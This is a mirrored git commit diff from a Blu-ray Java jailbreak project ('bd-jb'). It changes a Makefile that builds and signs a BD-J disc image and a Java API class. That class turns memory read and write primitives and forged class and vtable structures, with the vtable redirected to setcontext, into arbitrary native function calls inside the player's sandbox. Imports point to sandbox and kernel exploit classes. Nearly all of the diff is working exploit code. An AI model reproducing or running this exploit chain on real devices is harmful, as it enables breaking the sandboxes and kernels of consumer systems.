mirror of
https://github.com/TheOfficialFloW/bd-jb
synced 2024-11-10 11:15:12 -05:00
Clean up.
This commit is contained in:
parent
9dcf0bfe7f
commit
8d7ad41156
4
Makefile
4
Makefile
@ -28,7 +28,7 @@ CLASSES = \
|
|||||||
|
|
||||||
JFLAGS = -Xlint:all -Xlint:-options -source 1.4 -target 1.4 -bootclasspath "$(LIB)/rt.jar:$(LIB)/bdjstack.jar"
|
JFLAGS = -Xlint:all -Xlint:-options -source 1.4 -target 1.4 -bootclasspath "$(LIB)/rt.jar:$(LIB)/bdjstack.jar"
|
||||||
|
|
||||||
all: directory serialized classes jar bdmv
|
all: directory serialized classes jar bdjo_bdmv
|
||||||
|
|
||||||
directory:
|
directory:
|
||||||
mkdir -p $(BUILD)
|
mkdir -p $(BUILD)
|
||||||
@ -47,7 +47,7 @@ jar:
|
|||||||
cd $(BUILD) && jar cf ../$(DISC)/BDMV/JAR/00000.jar . && cd ..
|
cd $(BUILD) && jar cf ../$(DISC)/BDMV/JAR/00000.jar . && cd ..
|
||||||
java -cp "$(TOOLS)/security.jar:$(TOOLS)/bcprov-jdk15-137.jar:$(TOOLS)/tools.jar" net.java.bd.tools.security.BDSigner $(DISC)/BDMV/JAR/00000.jar
|
java -cp "$(TOOLS)/security.jar:$(TOOLS)/bcprov-jdk15-137.jar:$(TOOLS)/tools.jar" net.java.bd.tools.security.BDSigner $(DISC)/BDMV/JAR/00000.jar
|
||||||
|
|
||||||
bdmv:
|
bdjo_bdmv:
|
||||||
java -jar $(TOOLS)/bdjo.jar $(BDMV)/bdjo.xml $(DISC)/BDMV/BDJO/00000.bdjo
|
java -jar $(TOOLS)/bdjo.jar $(BDMV)/bdjo.xml $(DISC)/BDMV/BDJO/00000.bdjo
|
||||||
java -jar $(TOOLS)/MovieObject.jar $(BDMV)/MovieObject.xml $(DISC)/BDMV/MovieObject.bdmv
|
java -jar $(TOOLS)/MovieObject.jar $(BDMV)/MovieObject.xml $(DISC)/BDMV/MovieObject.bdmv
|
||||||
java -jar $(TOOLS)/index.jar $(BDMV)/index.xml $(DISC)/BDMV/index.bdmv
|
java -jar $(TOOLS)/index.jar $(BDMV)/index.xml $(DISC)/BDMV/index.bdmv
|
||||||
|
@ -81,6 +81,10 @@ public final class API {
|
|||||||
|
|
||||||
private native long multiNewArray(long componentType, int[] dimensions);
|
private native long multiNewArray(long componentType, int[] dimensions);
|
||||||
|
|
||||||
|
public boolean isJdk11() {
|
||||||
|
return jdk11;
|
||||||
|
}
|
||||||
|
|
||||||
private void init() throws Exception {
|
private void init() throws Exception {
|
||||||
initUnsafe();
|
initUnsafe();
|
||||||
initDlsym();
|
initDlsym();
|
||||||
@ -112,6 +116,7 @@ public final class API {
|
|||||||
}
|
}
|
||||||
|
|
||||||
handleField = nativeLibraryClass.getDeclaredField(HANDLE_FIELD_NAME);
|
handleField = nativeLibraryClass.getDeclaredField(HANDLE_FIELD_NAME);
|
||||||
|
|
||||||
findMethod.setAccessible(true);
|
findMethod.setAccessible(true);
|
||||||
handleField.setAccessible(true);
|
handleField.setAccessible(true);
|
||||||
|
|
||||||
@ -174,6 +179,7 @@ public final class API {
|
|||||||
long apiInstance = addrof(this);
|
long apiInstance = addrof(this);
|
||||||
long apiKlass = read64(apiInstance + 0x08);
|
long apiKlass = read64(apiInstance + 0x08);
|
||||||
|
|
||||||
|
boolean installed = false;
|
||||||
if (jdk11) {
|
if (jdk11) {
|
||||||
long methods = read64(apiKlass + 0x170);
|
long methods = read64(apiKlass + 0x170);
|
||||||
int numMethods = read32(methods + 0x00);
|
int numMethods = read32(methods + 0x00);
|
||||||
@ -194,7 +200,8 @@ public final class API {
|
|||||||
if (name.equals(MULTI_NEW_ARRAY_METHOD_NAME)
|
if (name.equals(MULTI_NEW_ARRAY_METHOD_NAME)
|
||||||
&& signature.equals(MULTI_NEW_ARRAY_METHOD_SIGNATURE)) {
|
&& signature.equals(MULTI_NEW_ARRAY_METHOD_SIGNATURE)) {
|
||||||
write64(method + 0x50, Java_java_lang_reflect_Array_multiNewArray);
|
write64(method + 0x50, Java_java_lang_reflect_Array_multiNewArray);
|
||||||
return;
|
installed = true;
|
||||||
|
break;
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
} else {
|
} else {
|
||||||
@ -217,14 +224,26 @@ public final class API {
|
|||||||
if (name.equals(MULTI_NEW_ARRAY_METHOD_NAME)
|
if (name.equals(MULTI_NEW_ARRAY_METHOD_NAME)
|
||||||
&& signature.equals(MULTI_NEW_ARRAY_METHOD_SIGNATURE)) {
|
&& signature.equals(MULTI_NEW_ARRAY_METHOD_SIGNATURE)) {
|
||||||
write64(method + 0x78, Java_java_lang_reflect_Array_multiNewArray);
|
write64(method + 0x78, Java_java_lang_reflect_Array_multiNewArray);
|
||||||
return;
|
installed = true;
|
||||||
|
break;
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
if (!installed) {
|
||||||
throw new IllegalStateException("Could not install native method.");
|
throw new IllegalStateException("Could not install native method.");
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// Invoke call method many times to kick in optimization.
|
||||||
|
train();
|
||||||
|
}
|
||||||
|
|
||||||
|
private void train() {
|
||||||
|
for (int i = 0; i < 10000; i++) {
|
||||||
|
call(0);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
private void buildContext(
|
private void buildContext(
|
||||||
long contextBuf,
|
long contextBuf,
|
||||||
long jmpBuf,
|
long jmpBuf,
|
||||||
@ -262,12 +281,6 @@ public final class API {
|
|||||||
write64(contextBuf + 0x118, 0);
|
write64(contextBuf + 0x118, 0);
|
||||||
}
|
}
|
||||||
|
|
||||||
public void train() {
|
|
||||||
for (int i = 0; i < 10000; i++) {
|
|
||||||
call(0);
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
public long call(long func, long arg0, long arg1, long arg2, long arg3, long arg4, long arg5) {
|
public long call(long func, long arg0, long arg1, long arg2, long arg3, long arg4, long arg5) {
|
||||||
long fakeClassOop = malloc(INT64_SIZE);
|
long fakeClassOop = malloc(INT64_SIZE);
|
||||||
long fakeClass = malloc(0x100);
|
long fakeClass = malloc(0x100);
|
||||||
@ -278,11 +291,6 @@ public final class API {
|
|||||||
throw new IllegalStateException("Could not allocate memory.");
|
throw new IllegalStateException("Could not allocate memory.");
|
||||||
}
|
}
|
||||||
|
|
||||||
write64(fakeClassOop, 0);
|
|
||||||
memset(fakeClass, 0, 0x100);
|
|
||||||
memset(fakeKlass, 0, 0x200);
|
|
||||||
memset(fakeKlassVtable, 0, 0x400);
|
|
||||||
|
|
||||||
try {
|
try {
|
||||||
long ret = 0;
|
long ret = 0;
|
||||||
|
|
||||||
@ -306,11 +314,14 @@ public final class API {
|
|||||||
} else {
|
} else {
|
||||||
write64(fakeKlassVtable + 0x158, __Ux86_64_setcontext); // multi_allocate
|
write64(fakeKlassVtable + 0x158, __Ux86_64_setcontext); // multi_allocate
|
||||||
}
|
}
|
||||||
|
|
||||||
ret = multiNewArray(fakeClassOop, MULTI_NEW_ARRAY_DIMENSIONS);
|
ret = multiNewArray(fakeClassOop, MULTI_NEW_ARRAY_DIMENSIONS);
|
||||||
|
|
||||||
|
if (i == 0) {
|
||||||
buildContext(
|
buildContext(
|
||||||
fakeKlass + 0x00, fakeKlass + 0x00, func, arg0, arg1, arg2, arg3, arg4, arg5);
|
fakeKlass + 0x00, fakeKlass + 0x00, func, arg0, arg1, arg2, arg3, arg4, arg5);
|
||||||
}
|
}
|
||||||
|
}
|
||||||
} else {
|
} else {
|
||||||
write64(fakeClassOop + 0x00, fakeClass);
|
write64(fakeClassOop + 0x00, fakeClass);
|
||||||
write64(fakeClass + 0x68, fakeKlass);
|
write64(fakeClass + 0x68, fakeKlass);
|
||||||
@ -326,12 +337,15 @@ public final class API {
|
|||||||
} else {
|
} else {
|
||||||
write64(fakeKlassVtable + 0x230, __Ux86_64_setcontext); // multi_allocate
|
write64(fakeKlassVtable + 0x230, __Ux86_64_setcontext); // multi_allocate
|
||||||
}
|
}
|
||||||
|
|
||||||
ret = multiNewArray(fakeClassOop, MULTI_NEW_ARRAY_DIMENSIONS);
|
ret = multiNewArray(fakeClassOop, MULTI_NEW_ARRAY_DIMENSIONS);
|
||||||
|
|
||||||
|
if (i == 0) {
|
||||||
buildContext(
|
buildContext(
|
||||||
fakeKlass + 0x20, fakeKlass + 0x20, func, arg0, arg1, arg2, arg3, arg4, arg5);
|
fakeKlass + 0x20, fakeKlass + 0x20, func, arg0, arg1, arg2, arg3, arg4, arg5);
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
}
|
||||||
|
|
||||||
if (ret == 0) {
|
if (ret == 0) {
|
||||||
return 0;
|
return 0;
|
||||||
|
@ -7,11 +7,11 @@
|
|||||||
|
|
||||||
package com.bdjb;
|
package com.bdjb;
|
||||||
|
|
||||||
import com.bdjb.exploit.sandbox.ExploitSandboxInterface;
|
import com.bdjb.exploit.kernel.ExploitKernelInterface;
|
||||||
import com.bdjb.exploit.sandbox.ExploitDefaultImpl;
|
import com.bdjb.exploit.sandbox.ExploitDefaultImpl;
|
||||||
import com.bdjb.exploit.sandbox.ExploitUserPrefsImpl;
|
import com.bdjb.exploit.sandbox.ExploitUserPrefsImpl;
|
||||||
|
import com.bdjb.exploit.sandbox.ExploitSandboxInterface;
|
||||||
import com.bdjb.exploit.sandbox.ExploitServiceProxyImpl;
|
import com.bdjb.exploit.sandbox.ExploitServiceProxyImpl;
|
||||||
import com.bdjb.exploit.kernel.ExploitKernelInterface;
|
|
||||||
import java.io.FileOutputStream;
|
import java.io.FileOutputStream;
|
||||||
import java.io.InputStream;
|
import java.io.InputStream;
|
||||||
import java.io.OutputStream;
|
import java.io.OutputStream;
|
||||||
|
Loading…
Reference in New Issue
Block a user